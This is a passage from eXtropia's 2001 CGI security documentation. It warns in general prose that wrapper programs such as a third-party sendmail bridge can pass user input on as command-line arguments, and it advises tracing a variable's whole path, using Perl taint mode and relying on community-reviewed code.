Or will they?
What if, behind the scenes, the sendmail binary actually called another
program and passed it command line parameters using the email address? If
this was the case, our previously 'secure' solution would be cracked wide
open.
Is this far fetched? Maybe yes. It turns out that the standard sendmail
binary does not suffer from this ``Russian Doll'' scenario.
However, history does repeat itself. While unlikely, it is not entirely out
of the question that an ISP running a third party sendmail system would
wish to write a sendmail program that converts calls to sendmail to the new
third-party mail system. It is conceivable that mistakes might be made in
this bridging code even to the extent of passing previously safe variables
as command line parameters to the new system.
While this is an unlikely scenario for sendmail, wrapper programs exist
everywhere. This is why scripting, especially Perl scripting, is so
popular. One Perl program can act as a glue for many other programs. It is
Perl’s strength.
Thus, you might think you are securely calling one program, but if that
program in turn calls many other programs, you should be aware of how it is
doing it. For example, not everyone else's Perl scripts you might call will
use taint mode. And not everyone writes in Perl, so taint mode may not even
be available to them as a tool. Always consider the entire path that your
variable will take when you pass it along to another program.
[ TOC ]
Has all of this given you a headache yet? To some degree it should.
Security is serious business. At least take solace in the fact that many
people are like us, mere mortals. It does not take a security genius to
look at every CGI script to make sure it is secure.
Rather, it takes some amount of vigilance on your part and also on the part
of everyone else using your source code to make sure your programs are
secure. It's not a matter of a one time security check either. New exploits
are published all the time, and subsequently new fixes are published all
the time.
To some degree publishing your code for securing programs is the best thing
you can do to help ensure safe CGI. The more you use objects that have been
checked over by a community of programmers, the more you can rely on the
program being bug free including security bugs.
[ TOC ]
[ TOC ]
[ TOC ]
|
Master Copy URL: http://www.extropia.com/support/docs/adt/
Copyright © 2000-2001 Extropia. All rights reserved.
|
[ TOC ]
|
Written by eXtropia. Last
Modified at 09/20/2001 |
|